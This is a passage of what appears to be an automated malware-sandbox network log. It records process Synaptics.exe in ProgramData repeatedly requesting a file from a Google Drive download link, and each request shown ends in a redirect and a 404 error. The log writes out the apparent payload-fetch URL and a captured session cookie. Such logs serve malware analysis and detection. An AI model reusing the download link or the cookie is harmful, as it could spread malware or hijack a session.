                                                                                                                                      2024-12-30 10:23:34 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      100192.168.2.549960142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:34 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:34 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-0GBu6YxR8QF1rTZD_Dpn_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      101192.168.2.549965142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:34 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:35 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7ibPmzOI1Lii0TxKIZx3GBxaI2KXhUOn74MPldB8H2GXMefFtQh8NytzOidJH7jkGT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:34 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-xpP2zZ-6zwRAmLyEzrh1CA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:35 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:35 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 48 58 4a 61 43 66 55 58 77 79 73 44 52 4d 6a 67 32 57 6d 4e 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="YHXJaCfUXwysDRMjg2WmNg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:35 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      102192.168.2.549966142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:34 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:34 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-D6hZ6RuMGu6o7xGCGhaY5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      103192.168.2.549973142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:35 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:36 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC50k40grudO0XMsDfqpLCiiqFXU8d3mLVHX4IKPEBh9vlC7ehNdzkLwSz7Lo0YEXWGueZEhfTg
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:35 GMT
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-SRHZKpJusfQ3tOce-mYiEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:36 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:36 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 73 58 31 5f 55 69 4b 6f 4b 62 75 5a 44 57 6e 7a 61 42 65 4f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="2sX1_UiKoKbuZDWnzaBeOg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:36 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      104192.168.2.549972142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:35 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:35 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-gKMn-aRIJQ69lQeHyjWAvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      105192.168.2.549974142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:35 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:35 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-gd228yi31VpFEIgXp70NoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      106192.168.2.549975142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:35 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:36 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4kgWIAoXPJEafRG-rBzAmLgMy_lUI4GLoGRNz-3itIi6_xEVeSd6WfscHCY21D7MClQcT4HOY
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:36 GMT
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-BflQQ2cwIyt5scdNY40m-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:36 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:36 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 31 64 4f 49 57 65 59 49 37 71 4e 44 7a 41 51 59 5f 6e 4b 37 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="q1dOIWeYI7qNDzAQY_nK7w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:36 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      107192.168.2.549983142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
